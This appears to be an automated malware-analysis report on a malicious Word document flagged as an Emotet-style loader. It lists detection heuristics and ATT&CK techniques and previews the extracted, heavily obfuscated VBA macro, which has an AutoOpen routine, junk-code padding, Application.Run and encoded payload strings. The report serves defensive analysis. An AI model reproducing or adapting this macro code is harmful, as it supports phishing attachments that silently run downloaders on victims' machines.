MALICIOUS
224
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing a VBA macro with an AutoOpen function, indicating it is designed to execute automatically upon opening. The macro utilizes CreateObject and a call to Application.Run, suggesting it attempts to download and execute a second-stage payload. The ClamAV detection 'Doc.Malware.Emodldr-10025032-0' further confirms its malicious nature.
Heuristics 8
-
ClamAV: Doc.Malware.Emodldr-10025032-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Emodldr-10025032-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 43252 bytes |
SHA-256: 63eb53d3e4cd7b4b4bae93bbf527d10c6d0d092903043fe8e926e4df0f33c868 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 20 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "CBFdkWFfszQ"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
lRAji = CByte(bGLhHi)
llNaV = sHZZJ
MtXhVj = Cos(54221 - Oct(24075 + UNrPh * AXuaR - CBool(OcXGFA)))
Application.Run fOLsqm + "NdRpXWhLo" + kEYpw, SVRXVK + QYDIORMfKTFqki + wsjfws
zQzaQ = CByte(phlIVB)
MivzEc = OtLAlu
qmfjt = Cos(97166 - Oct(43665 + TFwZP * kjIBUh - CBool(OwkaWF)))
End Sub
Attribute VB_Name = "DFwpWVz"
Sub GccCGo(pAfMw)
KCzQMl = CByte(pvFWsV)
NHICt = qdjYRb
zGjvKJ = Cos(45666 - Oct(87583 + wYKkX * KWGKl - CBool(AiscS)))
End Sub
Function QYDIORMfKTFqki()
On Error Resume Next
IuWcG = CByte(vrEtoW)
izuIuD = uLIVEP
jZJnVr = Cos(70010 - Oct(47469 + dGYZm * pcblsF - CBool(HWLLW)))
isHrsjiFEim = ZOzvBz("m0mAwAGUAMQBmADMANgA5AGMAYwBjAGMAMQA1AGQANgAzADIAMQBjADIAMwAzADUAMgA2ADIAMAAyADIAOABiADMAMwBiADAANABJlk", 4 + JYVWp - JYVWp, 97 + JYVWp - JYVWp)
wlBXrz = CByte(SvGSi)
FvRCVd = SWjuTX
RRnbJV = Cos(18390 - Oct(54687 + cijca * tWIGv - CBool(WpTpiX)))
sSmPU = CByte(DbTku)
CGOznV = fjvwR
VvUjKY = Cos(1361 - Oct(16094 + DdjaXu * wVImOk - CBool(IUBGa)))
wuUpHdBrUI = ZOzvBz("TAOQBkADIANQjWuSH.", 2 + ZFGDT - ZFGDT, 11 + ZFGDT - ZFGDT)
QzUUd = CByte(aivILt)
DDkQNz = inZpi
lbMMJ = Cos(34778 - Oct(49702 + hGJOwY * NBNwt - CBool(jQXDo)))
YdSzq = CByte(SuqtI)
ZmKLWt = jCiKt
RPGsFw = Cos(46060 - Oct(95526 + ziaNu * oNwoQf - CBool(XPGrD)))
djbXhjJTr = ZOzvBz("oihtH2IAZgBkADQAMgBkADEANAA1AGUAMAAzAGIANQBmADQAMAA0ADEAOQAzAGUAZQA1ADEAYwBmADcANQBhAGUANwBjcf", 7 + PddXi - PddXi, 86 + PddXi - PddXi)
qKtTY = CByte(ZzMBl)
kADmjl = ziuof
cFGsr = Cos(72947 - Oct(26356 + QHKGKB * VtbMN - CBool(jiHkiV)))
jjpkEu = CByte(GPwivv)
EOjssw = lhDKOF
LzvQM = Cos(40761 - Oct(79715 + pirSU * uizItR - CBool(zsDTkc)))
tAtjcVcsa = ZOzvBz("3ADEAYQBhAGIANgBimjmGcj%K", 2 + EcvVOz - EcvVOz, 16 + EcvVOz - EcvVOz)
CmaqpY = CByte(PASjaB)
YAAacM = wECVnj
Hswcs = Cos(88209 - Oct(27668 + IBdvq * hjYSQl - CBool(sDtHQE)))
NlHuiz = CByte(LrNvD)
cFsdf = wFvlZu
BvzjBS = Cos(31479 - Oct(42099 + iLsXUr * OEbbHN - CBool(TjlVlY)))
zFXJYu = ZOzvBz("jDfIWIAOABhAGEAMQA1ADYANQAwADgAYwBhADkAMABjADcAYQA1ADQAMgA4ADMAMgAwAGMAYgA4ADQAMAAyADEAYgA4ADcAZAA2ADIAOAA4AGUAYQBkADMAYwBlADYAMwAJo%7", 6 + hXVCs - hXVCs, 125 + hXVCs - hXVCs)
zhACw = CByte(NLMcnl)
XhlIXF = hhwTX
JdwPzf = Cos(95447 - Oct(25550 + drVXQb * sznWQ - CBool(mwdzj)))
RpTItv = CByte(IYUnL)
MdaAZ = qWmZEa
tMAUS = Cos(73108 - Oct(8995 + MvDjW * bAYmj - CBool(akHPwP)))
ANJPLnjB = ZOzvBz("QIrADIAOABkAGIANABiAGIAMgBkADEAOAA2AGIAMQA3AGQANQAzAGEAZAA3ADgAZQBmADEAYQA4AGIAYQAwADIAMgBmAGYAZgBhAGUANgBlADIANQA0AHln", 4 + lSihi - lSihi, 113 + lSihi - lSihi)
ocfQP = CByte(XBpHEC)
GFAhX = DXPVO
UdvJFk = Cos(45956 - Oct(3946 + QZhinC * NlsTki - CBool(UkZsfM)))
YnlIJ = CByte(ahavnt)
jhVDz = zXrAbO
QBZjU = Cos(44835 - Oct(29926 + kcPJu * NivDZI - CBool(HiMliR)))
WsBqmWcH = ZOzvBz("PO65QAzADkAMwBkAGUAOQBkAGQANwA1ADYAj5", 5 + ZHQivE - ZHQivE, 31 + ZHQivE - ZHQivE)
vhnJt = CByte(TZHrbQ)
PzEFtC = ltwwCG
JSMzpF = Cos(15119 - Oct(26100 + pGQFc * WDcIiN - CBool(dHrbX)))
wqjbL = CByte(aclRlK)
nUTVW = jzJPo
KlHtS = Cos(82509 - Oct(9692 + stzoB * JDoOi - CBool(nBGPJ)))
UlABwJwaC = ZOzvBz("JT5ADEAOQA3ADAANABmADcANQBkAGIAOAA3AGEAOQBmAGMAZQA1ADEAMQA2ADcAYwA0AGEAMQBiADQANQA2ADIAYgAzADUAMAAwAGIAOAA1ADIANQBiADcAOAAyAGQAMwBjADAAMQBhADgAMwA2AGEAYQAyADkAYwBkAGEAMgA0ADIAOQA2ADEANwBjAGIAYgA0ADAAvi2o", 3 + BkqHn - BkqHn, 195 + BkqHn - BkqHn)
wvJcm = CByte(vSBvTi)
ajrVu = iTwLd
vjiUJ = Cos(59325 - Oct(84705 + ssJJQG * tjYOk - CBool(vHZwf)))
izGKDu = CByte(MQOmp)
XEiMRB = PhjGIT
QoWjoD = Cos(41344 - Oct(25553 + vOLCS * XbJPZC - CBool(amczC)))
RojbpaJTVBS = ZOzvBz("CDkAZQA2ADUAYQBkADIAZAAwADUAZgBlADUAMwBlADQAOAAwAGMAYgAzADIANQAzAGY%2wqL", 2 + siGBj - siGBj, 66 + siGBj - siGBj)
wQABkw = CByte(XtfwmL)
iiwFw = iKHzt
wuNkHr = Cos(2434 - Oct(80685 + GvMbG * JdvLcN - CBool(n
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.